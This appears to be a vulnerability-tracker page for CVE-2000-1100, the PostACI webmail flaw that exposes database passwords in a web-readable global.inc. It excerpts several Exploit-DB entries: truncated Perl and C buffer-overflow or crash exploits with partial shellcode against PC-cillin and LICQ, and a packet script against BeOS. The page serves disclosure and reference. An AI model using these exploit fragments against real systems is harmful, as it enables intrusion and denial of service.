CVE-2000-1100
published 2001-01-09CVE-2000-1100: The default configuration for PostACI webmail system installs the /includes/global.inc configuration file within the web root, which allows remote attackers to…
PriorityP432high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
5.71%
92.1th percentile
The default configuration for PostACI webmail system installs the /includes/global.inc configuration file within the web root, which allows remote attackers to read sensitive information such as database usernames and passwords via a direct HTTP GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trlinux | postaci_webmail | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
exploitdb·2002-12-10
CVE-2002-1349 Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow
---
source: https://www.securityfocus.com/bid/6350/info
A buffer overflow vulnerability has been reported for PC-cillin's mail scanning utility.
An attacker can exploit this vulnerability by connecting to a vulnerable pop3trap.exe service and sending an overly long string. This will result in the process crashing and allowing the attacker to gain control over the execution of the process.
#!/usr/bin/perl
#pc-cillin DOS..will add shellcode l8r..
use IO::Socket;
$buf = 1100;
$host = $ARGV[0];
$port = $ARGV[1];
#shellcode needs to be modded..
#return addr is in the shellcode; doesn't work? go figure..
$hellcode = "\xF0\x00\x00\x00\x58\x55\x89\xE5\x81\xEC\x2C\x00\x00\x00\x89\x45\xD4\xC7\x45\xFC".
"\x00\x00\xE7\x77\x8B
Exploit-DB
LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow
exploitdb·2000-12-26
CVE-2001-0440 LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow
LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/2406/info
At least one version of LICQ is vulnerable to a remote buffer overflow. By sending many characters (12000-16000) to the port on which LICQ is listening, an attacker can cause excessive data to be copied onto the stack and overwrite critical parts of the stack frame such as the calling functions' return address. Since this data is supplied by the user it can alter the program's flow of execution.
/*
* Name: Licqkill.c
* Author: Stan Bubrouski
* Date: December 26, 2000
* Description: Licq will crash when 16707 or more characters are sent to the port
* Licq is listening on. Finding the port Licq is running on is pretty
* simple because by default it starts using ports around 1100 or s
Exploit-DB
Trlinux Postaci Webmail 1.1.3 - Password Disclosure
exploitdb·2000-11-30
CVE-2000-1100 Trlinux Postaci Webmail 1.1.3 - Password Disclosure
Trlinux Postaci Webmail 1.1.3 - Password Disclosure
---
source: https://www.securityfocus.com/bid/2029/info
Postaci Webmail is a database-driven web e-mail system. PostACI contains a vulnerability in its default configuration that may allow a remote attacker to gain access to the underlying database.
Webmail stores database username and password information in a file called global.inc. This file is world-readable and stored in a directory accessible by a web browser over the internet. As a result, an attacker can retrieve the global.inc file with a web browser on a typical system (default configuration). Once obtained, the attacker may be able to access the systems database.
Successful exploitation will lead to the attacker gaining unauthorized access to the database.
Depending on th
Exploit-DB
Be BeOS 4.0/4.5/5.0 - IP Packet Length Field
exploitdb·2000-04-07
CVE-2000-0279 Be BeOS 4.0/4.5/5.0 - IP Packet Length Field
Be BeOS 4.0/4.5/5.0 - IP Packet Length Field
---
source: https://www.securityfocus.com/bid/1100/info
The networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28.
--------------becasl.casl--------------------
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet =
No writeups or analysis indexed.
2001-01-09
Published